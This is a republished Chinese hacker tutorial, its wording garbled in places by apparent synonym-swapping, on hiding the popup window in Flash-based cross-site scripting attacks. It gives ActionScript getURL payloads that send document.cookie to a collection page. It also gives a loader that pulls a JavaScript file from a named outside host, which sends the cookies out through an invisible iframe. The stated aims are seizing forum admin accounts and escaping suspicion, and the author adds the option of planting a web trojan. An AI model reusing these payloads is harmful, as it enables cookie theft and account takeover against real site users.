<b>避免Flash跨站攻击弹出IE窗口</b>[Flash设计]
本文“<b>避免Flash跨站攻击弹出IE窗口</b>[Flash设计]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
前些天一向忙着学习WIN32汇编,一向懒得写文章,这些天来仿佛Flash跨站攻击闹的挺凶的,但在实施Flash跨站攻击时的那个弹出的IE窗口很简单惹起别人的猜疑,而使得Flash跨站攻击失利,这的确让人多少有点头疼,大家是不是也一向在探求实施Flash跨站攻击时不弹出IE窗口的办法来躲藏自己的攻击行为呢?下面大家和我一同来办理这个不大不小的问题,让Flash跨站攻击更完善吧!
普通来说大家在举行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,以下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于汇集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来得到管理员或用户的Cookie,从而得到管理权限,进一步乘机掌握整个站点,终究到达自己的目的.我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本顶用到的代码翻开了一个我们又爱又恨的窗口,所以我们也只能从改革这个脚本代码来实现躲藏大概是去掉弹出的IE窗口,除此外别无它法!
我们先解析一下上面的AtionScript脚本,它利用AtionScript脚本函数"getURL"跳转到一个利用JavaScript协议的URL(JavaScript协议背面就是我们非常熟习的JavaScript脚本代码),在JavaScript中利用document.cookie的到Cookie,并把Cookie和一个用于汇集Cookie的网页地址连成一个http协议的URL地址,最后利用window.open翻开合成的URL地址,从而把Cookie用GET方法发送到用于汇集Cookie的网页,并记录下来.
通过上面的解析我们进一步理解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定翻开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内翻开)"、"_blank (在新窗口中翻开)"、"_parent (在当前框架的父框架内翻开.假定当前框架无父框架,此参数值平等于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内翻开)"、"_self(在当前窗口中翻开,覆盖当前文档)"、"_top (在全部框架之外的最顶层窗口中翻开 .假定当前窗口无框架构造,此参数值平等于 _self )"等几种,假如我们以"_search"来翻开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改成:
getURL("BLOCKED SCRIPTwindow.open(’http://用于汇集Cookie的网页地址?’+document cookie,’_search’)","_self")
当然,这样做会翻开搜索面板,也会惹起猜疑,但却可以躲过那些关闭弹出窗口软件的追杀!姑且也算一种办法吧!
假如仅仅是上面所说的,相信不少读者要把我......
看到这里聪明的你是不是想到了点办理的思绪?对!既然支持JavaScript啦,还有啥东东会不能办理呢?JavaScript真的是好处多多呀!
假如你曾看了我的那篇"打造一个完善的IE网页木马"的文章,并且你对此中的代码深深理解的话,你可以自己先去想象一下啦!
在那篇文章中有下面这样一段代码:
window.open("file:BLOCKED SCRIPTdocument.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","icyfoxlovelace");
利用了javascript协议把自己网站上的一个js代码文件插入到了本地文件中,一样的原理我们也可以用它把一个js代码文件插入到举行跨站攻击的论坛网页中,呼应的AtionScript脚本改成:
getURL("BLOCKED SCRIPTdocument.all.tags(’SCRIPT’)[0].src=’http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js’;eval();","_self")此中icyfox.js得内容以下:
cookieurl="http://用于汇集Cookie的网页地址?cookie="+escape(document.cookie);/*这里利用了escape()对cookie编码,用来避免cookie中的一些特别字符*/
document.body.insertAdjacentHTML('beforeEnd','<iframe WIDTH=0px HEIGHT=0px style="display:none;" src="'+cookieurl+'"><\/iframe>');
/*这里利用了insertAdjacentHTML在body的最后插入了一个不可见的框架*/
这里主如果操纵了可以在一个网页中引入差别域中的javascript代码文档,并且所引入的javascript代码文档会和本网页融为一体的特点!
好啦!至此Flash跨站攻击弹出IE窗口的问题算是办理啦!当然假如你乐意,在icyfox.js中加个网页木马之类的我也无话可说!
最后我再趁便说一句,它一样可以用于在其他范例的跨站脚本功击中躲藏弹出的IE窗口!比起操纵Microsoft.XMLHTTP控件发送COOKIE要随便的多,因为它不会像Microsoft.XMLHTTP控件那样只能发给当前服务器,还有核心上czy的"操纵Microsoft.XMLHTTP控件发送COOKIE"一文中提到这样一句话:
"从前我想了一个在网页顶用insertAdjacentHTML办法来注入HTML语句的办法委曲可以作到发送COOKIE不呈现IE窗口,但是在实际利用中有时会碰到IE出错."
具我解析是因为在COOKIE中存在了一些特别字符,而czy没有精确处理或是编码,才会在实际利用中有时会碰到IE出错,所以上面代码我用了escape()对cookie编码,在承遭到cookie后请注意用unescape()来解码
以上是“<b>避免Flash跨站攻击弹出IE窗口</b>[Flash设计]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“<b>避免Flash跨站攻击弹出IE窗口</b>”更多相关内容
中查找“<b>避免Flash跨站攻击弹出IE窗口</b>”更多相关内容